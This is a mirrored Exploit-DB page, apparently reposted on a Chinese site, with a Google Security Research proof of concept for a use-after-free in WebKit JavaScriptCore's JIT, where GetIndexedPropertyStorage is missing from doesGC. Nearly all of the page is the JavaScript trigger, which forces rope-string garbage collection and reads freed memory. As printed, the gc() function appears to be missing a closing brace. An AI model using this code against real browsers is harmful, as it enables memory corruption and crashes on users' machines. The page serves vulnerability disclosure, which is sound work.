WebKit JSC JIT – GetIndexedPropertyStorage Use-After-Free - 体验盒子

作者： Google Security Research

日期： 2019-01-16

类别：

dos

平台：

multiple

来源：https://www.exploit-db.com/exploits/46183/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

/*

The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.

PoC:

*/

function gc() {

for (let i = 0; i < 10; i++) {

new ArrayBuffer(1024 * 1024 * 10);

}

function opt(arr) {

let r = /a/;

let o = {};

arr[0].charAt(0);

arr[1].charAt(0);

arr[2].charAt(0);

arr[3].charAt(0);

arr[4].charAt(0);

arr[5].charAt(0);

arr[6].charAt(0);

arr[7].charAt(0);

arr[8].charAt(0);

arr[9].charAt(0);

o.x = 'a'.match(r);

return o;

}

function main() {

for (let i = 0; i < 10000; i++) {

opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);

}

let a = 'a'.repeat(1024 * 1024 * 2);

let b = 'a'.repeat(1024 * 1024 * 2);

let arr = [];

for (let i = 0; i < 10; i++) {

arr[i] = a + b;

}

gc();

let o = opt(arr);

gc();

let tmp = [1234];

print(o.x);// 1234

}

main();